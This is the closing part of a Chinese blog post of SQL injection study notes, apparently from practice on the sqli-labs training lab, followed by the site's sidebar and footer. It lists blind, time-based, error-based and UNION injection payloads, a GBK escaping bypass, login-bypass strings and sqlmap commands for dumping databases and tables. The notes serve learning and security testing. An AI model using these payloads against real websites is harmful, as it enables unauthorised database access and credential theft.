<li><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">left(user(),1)&gt;'r'  </span><br><span class="line">right(user(),1)&gt;'r'  </span><br><span class="line">substr(user(),1,1)='r'  </span><br><span class="line">mid(user(),1,1)='r' </span><br><span class="line">    </span><br><span class="line">//不使用逗号 </span><br><span class="line">user() regexp '^[a-z]'</span><br><span class="line">user() like 'root%'</span><br><span class="line">POSITION('root' in user())</span><br><span class="line">mid(user() from 1 for 1)='r'</span><br><span class="line">mid(user() from 1)='r'</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><h5 id="利用order-by盲注"><a href="#利用order-by盲注" class="headerlink" title="利用order by盲注"></a>利用order by盲注</h5><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from admin where username='' or 1 union select 1,2,'5' order by 3;</span><br><span class="line">+<span class="comment">----+----------+---------------------------</span></span><br><span class="line">| id | username | password                   </span><br><span class="line">+<span class="comment">----+----------+---------------------------</span></span><br><span class="line">|  1 | 2        | 5                         </span><br><span class="line">|  1 | admin    | 51b7a76d51e70b419f60d34 |</span><br><span class="line">+<span class="comment">----+----------+---------------------------</span></span><br><span class="line">2 rows in <span class="keyword">set</span> (<span class="number">0.00</span> sec)</span><br><span class="line">    </span><br><span class="line">mysql&gt; <span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">where</span> username=<span class="string">''</span> <span class="keyword">or</span> <span class="number">1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="string">'6'</span> <span class="keyword">order</span> <span class="keyword">by</span> <span class="number">3</span>;</span><br><span class="line">+<span class="comment">-----+--------+---------------------------</span></span><br><span class="line">|id   |username| password                  </span><br><span class="line">+<span class="comment">----+--------+---------------------------</span></span><br><span class="line">|  1  | admin- |51b7a76d51e70b419f60d3</span><br><span class="line">|  1  |    2   | 6                            +<span class="comment">------+----------+-------------------------</span></span><br><span class="line">2 rows in <span class="keyword">set</span> (<span class="number">0.01</span> sec)</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h4 id="延时盲注"><a href="#延时盲注" class="headerlink" title="延时盲注"></a>延时盲注</h4><ul>
<li>相对于bool盲注，就是把返回值0和1改为是否执行延时，<strong>能用其他方法就不使用延时</strong>。 </li>
<li>一般格式<code>if((bool),sleep(3),0)</code>和<code>or (case when (bool) then sleep(3) else 0 end)</code></li>
<li>两个函数： </li>
<li>BENCHMARK(100000,MD5(1)) </li>
<li>sleep(5)</li>
<li>BENCHMARK()用于测试函数的性能，参数一为次数，二为要执行的表达式。可以让函数执行若干次，返回结果比平时要长，通过时间长短的变化，判断语句是否执行成功。这是一种边信道攻击，在运行过程中占用大量的cpu资源。推荐使用sleep()</li>
</ul>
<h4 id="Mysql注释符"><a href="#Mysql注释符" class="headerlink" title="Mysql注释符"></a>Mysql注释符</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1. <span class="comment">-- -</span></span><br><span class="line">2. <span class="comment">/* .... */</span></span><br><span class="line">3. <span class="comment">#</span></span><br><span class="line">4. `</span><br><span class="line">5. ;%00</span><br></pre></td></tr></table></figure>

<h4 id="GBK绕过注入"><a href="#GBK绕过注入" class="headerlink" title="GBK绕过注入"></a>GBK绕过注入</h4><ul>
<li>在分号前加%df%27</li>
<li>示例：id=1%d%27 union select 1.2–+</li>
</ul>
<ol start="10">
<li>自动化注入工具</li>
</ol>
<h4 id="SQL注入工具"><a href="#SQL注入工具" class="headerlink" title="SQL注入工具"></a>SQL注入工具</h4><ul>
<li>sqlmap使用<ul>
<li>测试注入点  sqlmap  -u  “URL”</li>
<li>爆数据库  sqlmap  -u  “URL”  –dbs</li>
<li>查看当前库  sqlmap  -u  “URL”  –current -db</li>
<li>显示数据表  sqlmap  -u  “URL”  -D 数据库 –tables</li>
<li>显示字段      sqlmap  -u  “URL”  -D 数据库 -T 表  –columns</li>
<li>脱库  sqlmap  -u  “URL”  -D 数据库 -T 表  -C “字段名1”,”字段名2”  –dump</li>
<li>查看帮助   man  sqlmap</li>
<li>查看注入点   sqlmap -r  1.txt </li>
<li>爆数据库   sqlmap -r  1.txt  –dbs    （注意在注入点后面加*）</li>
<li>查看当前库  sqlmap  -r  1.txt  –current -db</li>
<li>显示数据表   sqlmap   -r  1.txt   -D 数据库 –tables</li>
<li>显示字段      sqlmap  -r  1.txt  -D 数据库 -T 表  –columns</li>
<li>查看某字段数据  sqlmap  -r  1.txt  -D 数据库 -T 表  -C  “字段名，字段名”  –dump</li>
</ul>
</li>
<li>havij</li>
<li>sqlid</li>
</ul>
<h4 id="ASP、JSP注入工具"><a href="#ASP、JSP注入工具" class="headerlink" title="ASP、JSP注入工具"></a>ASP、JSP注入工具</h4><ul>
<li>NBSI</li>
<li>阿D注入软件</li>
<li>明小子</li>
</ul>
<h4 id="PHP注入工具"><a href="#PHP注入工具" class="headerlink" title="PHP注入工具"></a>PHP注入工具</h4><ul>
<li>穿山甲注入软件</li>
<li>海阳顶端注入软件</li>
</ul>
<h4 id="安全专家用的注入工具"><a href="#安全专家用的注入工具" class="headerlink" title="安全专家用的注入工具"></a>安全专家用的注入工具</h4><ul>
<li>BSQL Hacker（注入框架）</li>
<li>The Mole（可攻击Mysql、SQL server、Postgres和oracle）</li>
<li>Pangolin （白帽专用啊哈哈哈哈）</li>
<li>sqlamp  （非常强大）</li>
<li>Havij （可攻击Mysql、oracle、Postgres、MS Access）</li>
<li>safe3 SQL Injector（简单易用）</li>
<li>SQL Poizon</li>
</ul>
<h3 id="10-笔记"><a href="#10-笔记" class="headerlink" title="10. 笔记"></a>10. 笔记</h3><ul>
<li>爆SQL<br>select schema_name from information_schema.schemata<br>猜数据库<br>select schema_name from information_schema.schemata limit 0,1 （limit第几行）<br>test</li>
<li>select table_name from information_schema.tables where table_schema=’xxxxx’<br>猜某库的数据表</li>
<li>select column_name from information_schema.columns where table_name=’xxxxx’<br>猜某表的所有列</li>
<li>select <strong>* from *</strong></li>
<li></li>
<li>mid(a,b,c)从位置 b 开始，截取 a 字符串的 c 位<br>ord 同ASCII<br>substr（user(),2,1）<br>substr（database(),2,1）从databases数据库名的第2位，截取长度为1<br>Order by 对前面的数据进行排序<br>information_schema 系统数据库名<br>tables 表名<br>information_schema.tables 查询这个数据库表<br>table_schema 这个字段<br>select table_name from information_schema.tables where table_schema = “security”;<br>select 列名称from表名 where列 运算符 值<br>@$sql=”SELECT username, password FROM users WHERE username=’admin’or’1’=’1# and<br>password=’$passwd’ LIMIT 0,1”;<br>数据库运行的SQL语句代码如上:<br>输入“ ‘后，注意 提示语法错误的 注明 ’ ” ）<br>‘) or ‘1’=(‘1’<br>) or 1=1 -<br>‘) or 1=1 order by 2  查看几列</li>
<li>显示登录信息可以使用联合查询得到数据库名等信息<br>uname=1admin’union select 1,database()– -&amp;passwd=&amp;submit=Submit<br>联合查询  得到  database(数据库名)</li>
<li>不显示登录信息使用 布尔型盲注<br>uname=admin’)and left(database(),1)&gt;’a’#&amp;passwd=1&amp;submit=Submit<br>database(),1表示第一位 &gt;大于a        大于的话就返回true<br>left(database(),1) =’s’    截取数据库名的前1位<br>left(database(),2) =’se’  截取数据库名的前2位<br>length(database())=8  查看数据库的长度<br>left(version()1)=5    查看数据库第1位为5<br>通过二分法 查到某位没有&gt;,= a（或者数字）<br>注释掉最后字符 – - –+ # %23 （每个试）</li>
<li>substr(database(),,c)从 b 位置开始，截取字符串 a 的 c 长度。Ascii()将某个字符转换<br>为 ascii 值</li>
<li>admin’and If(ascii(substr(database(),2,1))=115,1,sleep(5))#<br>时间注入 正确的话 直接登录，否则延迟5秒，得出 数据库名为 security<br>‘and If(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101,1,sleep(5))– -<br>猜测第一个数据表的第一位是 e…依次类推，得到 emai<br>limit 0,1 从0的位置开始 第1行 是emai  limit 1,1 从1的位置开始 第1行 是 ？？<br>猜测 users 表的列<br><a href="http://127.0.0.1/sqllib/Less-9/?id=1&#39;and" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-9/?id=1&#39;and</a> If(ascii(substr((select column_name from information<br>_schema.columns where table_name=’users’ limit 0,1),1,1))=105,1,sleep(5))–+<br>猜测 username 的值<br><a href="http://127.0.0.1/sqllib/Less-9/?id=1&#39;and" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-9/?id=1&#39;and</a> If(ascii(substr((select username from users limit 0,1), 1,1))=68,1,sleep(5))– -<br>猜第2位<br>‘and If(ascii(substr((select username from users limit 0,1), 2,1))=117,1,sleep(5))– -<br>是Dump<br>SELECT CONCAT(id, ‘，’, name) AS con FROM info LIMIT 1<br>concat 某几列<br>limit1    行1<br>以上为  查询第一行的  id 列 和name列，中间用,号隔开</li>
<li>报 错 注 入<br>1’ union Select 1,count(<em>),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)</em>2))a from information_schema.columns group by a–+</li>
<li>uname=admin”and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&amp;passwd=1&amp;sub<br>If(ascii(substr(database(),1,1))&gt;115,0,sleep(5))%23</li>
<li>select table_name from information_schema.tables where table_schema=’security’ limit 0,1<br>table_name<br>MYSQL 里面所有的表<br>information_schema.tables</li>
<li>系统函数<br>介绍几个常用函数：</li>
<li><ol>
<li>version()——MySQL 版本</li>
<li>user()——数据库用户名</li>
<li>database()——数据库名</li>
<li>@@datadir——数据库路径</li>
<li>@@version_compile_os——操作系统版本</li>
</ol>
</li>
</ul>

      
    </div>

    

    
    
    

    
<div>
  
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-heart"></i>感谢阅读-------------</div>
    
</div>
  
</div>
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/10/02/sqli-labs-lession-21-base64编码单引号和括号的Cookie注入/" rel="prev" title="sqli-labs-lession 21 base64编码单引号和括号的Cookie注入">
                <i class="fa fa-chevron-left"></i> sqli-labs-lession 21 base64编码单引号和括号的Cookie注入
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/10/01/ubuntn踩坑手册/" rel="next" title="ubuntn踩坑手册">
                ubuntn踩坑手册 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <a href="/">
                <img class="site-author-image" itemprop="image" src="/images/jack.jpg" alt="嘤嘤怪er">
              </a>
            
              <p class="site-author-name" itemprop="name">嘤嘤怪er</p>
              <p class="site-description motion-element" itemprop="description">0menc</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">101</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">16</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">17</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-OSI七层模型"><span class="nav-number">1.</span> <span class="nav-text">1. OSI七层模型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-TCP三次握手"><span class="nav-number">2.</span> <span class="nav-text">2. TCP三次握手</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-TCP四次分手"><span class="nav-number">3.</span> <span class="nav-text">3. TCP四次分手</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-HTTP状态码"><span class="nav-number">4.</span> <span class="nav-text">4. HTTP状态码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-常用端口"><span class="nav-number">5.</span> <span class="nav-text">5.  常用端口</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-数据库基础"><span class="nav-number">6.</span> <span class="nav-text">6. 数据库基础</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#主流数据库"><span class="nav-number">6.1.</span> <span class="nav-text">主流数据库</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#数据库查询版本"><span class="nav-number">6.2.</span> <span class="nav-text">数据库查询版本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL语法基础"><span class="nav-number">6.3.</span> <span class="nav-text">SQL语法基础</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-注入漏洞"><span class="nav-number">7.</span> <span class="nav-text">7.  注入漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#注入概述"><span class="nav-number">7.1.</span> <span class="nav-text">注入概述</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#注入类型"><span class="nav-number">7.2.</span> <span class="nav-text">注入类型</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#注入点"><span class="nav-number">7.3.</span> <span class="nav-text">注入点</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#自动化注入工具"><span class="nav-number">7.4.</span> <span class="nav-text">自动化注入工具</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-SQL手工注入步骤"><span class="nav-number">8.</span> <span class="nav-text">8. SQL手工注入步骤</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#注入点寻找"><span class="nav-number">8.1.</span> <span class="nav-text">注入点寻找</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#数字型注入"><span class="nav-number">8.2.</span> <span class="nav-text">数字型注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#字符型注入"><span class="nav-number">8.3.</span> <span class="nav-text">字符型注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断字段长度"><span class="nav-number">8.4.</span> <span class="nav-text">判断字段长度</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断字段回显位置"><span class="nav-number">8.5.</span> <span class="nav-text">判断字段回显位置</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断数据库注入"><span class="nav-number">8.6.</span> <span class="nav-text">判断数据库注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查找数据库名"><span class="nav-number">8.7.</span> <span class="nav-text">查找数据库名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查找数据表"><span class="nav-number">8.8.</span> <span class="nav-text">查找数据表</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查找数据表中所有字段（列）"><span class="nav-number">8.9.</span> <span class="nav-text">查找数据表中所有字段（列）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#127-0-0-1-Less-3-id-100’-union-select-1-select-group-concat-column-name-from-information-schema-columns-where-table-name-’users’-and-table-schema-’security’-–"><span class="nav-number">8.10.</span> <span class="nav-text">127.0.0.1/Less-3/?id=100’) union select 1,(select group_concat(column_name) from information_schema.columns where table_name=’users’ and table_schema=’security’) –+</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#猜解账号密码"><span class="nav-number">8.11.</span> <span class="nav-text">猜解账号密码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#绕过登陆验证"><span class="nav-number">8.12.</span> <span class="nav-text">绕过登陆验证</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL注入常见函数"><span class="nav-number">8.13.</span> <span class="nav-text">SQL注入常见函数</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-SQL注入备忘"><span class="nav-number">9.</span> <span class="nav-text">9. SQL注入备忘</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL注入常用命令"><span class="nav-number">9.1.</span> <span class="nav-text">SQL注入常用命令</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#UNION注入"><span class="nav-number">9.2.</span> <span class="nav-text">UNION注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#报错注入"><span class="nav-number">9.3.</span> <span class="nav-text">报错注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ExtractValue-有长度限制-最长32位-（select-version可修改）"><span class="nav-number">10.</span> <span class="nav-text">ExtractValue(有长度限制,最长32位)   （select @@version可修改）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#UpdateXml-有长度限制-最长32位-（SELECT-version可修改）"><span class="nav-number">11.</span> <span class="nav-text">UpdateXml(有长度限制,最长32位)  （SELECT @@version可修改）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#NAME-CONST-适用于低版本，不太好用"><span class="nav-number">12.</span> <span class="nav-text">NAME_CONST(适用于低版本，不太好用)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Error-based-Double-Query-Injection"><span class="nav-number">13.</span> <span class="nav-text">Error based Double Query Injection</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-5-5-5以上-（select-user-可修改）"><span class="nav-number">14.</span> <span class="nav-text">exp(5.5.5以上) （select user()可修改）</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#bool盲注"><span class="nav-number">14.1.</span> <span class="nav-text">bool盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#布尔条件构造"><span class="nav-number">14.1.1.</span> <span class="nav-text">布尔条件构造</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#构造逻辑判断"><span class="nav-number">14.1.2.</span> <span class="nav-text">构造逻辑判断</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#利用order-by盲注"><span class="nav-number">14.1.3.</span> <span class="nav-text">利用order by盲注</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#延时盲注"><span class="nav-number">14.2.</span> <span class="nav-text">延时盲注</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Mysql注释符"><span class="nav-number">14.3.</span> <span class="nav-text">Mysql注释符</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#GBK绕过注入"><span class="nav-number">14.4.</span> <span class="nav-text">GBK绕过注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL注入工具"><span class="nav-number">14.5.</span> <span class="nav-text">SQL注入工具</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ASP、JSP注入工具"><span class="nav-number">14.6.</span> <span class="nav-text">ASP、JSP注入工具</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#PHP注入工具"><span class="nav-number">14.7.</span> <span class="nav-text">PHP注入工具</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#安全专家用的注入工具"><span class="nav-number">14.8.</span> <span class="nav-text">安全专家用的注入工具</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10-笔记"><span class="nav-number">15.</span> <span class="nav-text">10. 笔记</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 – <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">嘤嘤怪er</span>

  

  
</div>











        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.4.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.4.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.4.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.4.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.4.1"></script>



  



  










  





  

  

  

  

  
  

  

  

  

  

  


<script type="text/javascript">

    var a_idx = 0;
    jQuery(document).ready(function($) {
        $("body").click(function(e) {
            var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正" ,"法治", "爱国", "敬业", "诚信", "友善");
            var $i = $("<span />").text(a[a_idx]);
            a_idx = (a_idx + 1) % a.length;
            var x = e.pageX,
                y = e.pageY;
            $i.css({
                "z-index": 99999999999999999999999999999999999999999999999999999999999999999999999999 ,
                "top": y - 20,
                "left": x,
                "position": "absolute",
                "font-weight": "bold",
                "color": "#ff6651"
            });
            $("body").append($i);
            $i.animate({
                    "top": y - 180,
                    "opacity": 0
                },
                1500,
                function() {
                    $i.remove();
                });
        });
    });
</script>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300,"bottom":-40},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
